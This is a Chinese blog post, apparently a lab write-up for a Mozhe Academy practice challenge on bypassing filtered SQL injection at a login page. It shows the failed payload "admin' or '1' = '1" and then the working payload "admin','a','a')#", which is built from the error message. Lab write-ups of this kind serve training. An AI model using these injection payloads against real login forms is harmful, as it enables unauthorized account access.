墨者学院-SQL过滤字符后手工绕过漏洞测试(万能口令)
墨者学院-SQL过滤字符后手工绕过漏洞测试(万能口令)
前言
靶场地址:https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe
正文
打开靶场环境
提示我们登陆admin账号即可拿到KEY
首先尝试万能密码
admin' or '1' = '1
登录失败,并没有用。
回到正常思路,构造payload
admin'
此时出现报错
去掉两端引号后,分析报错
a','a') and password = '123'
构造('admin','a','a')形成闭合,再用#号屏蔽)后面的内容
最终payload为
admin','a','a')#
登陆成功,拿到本题KEY。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)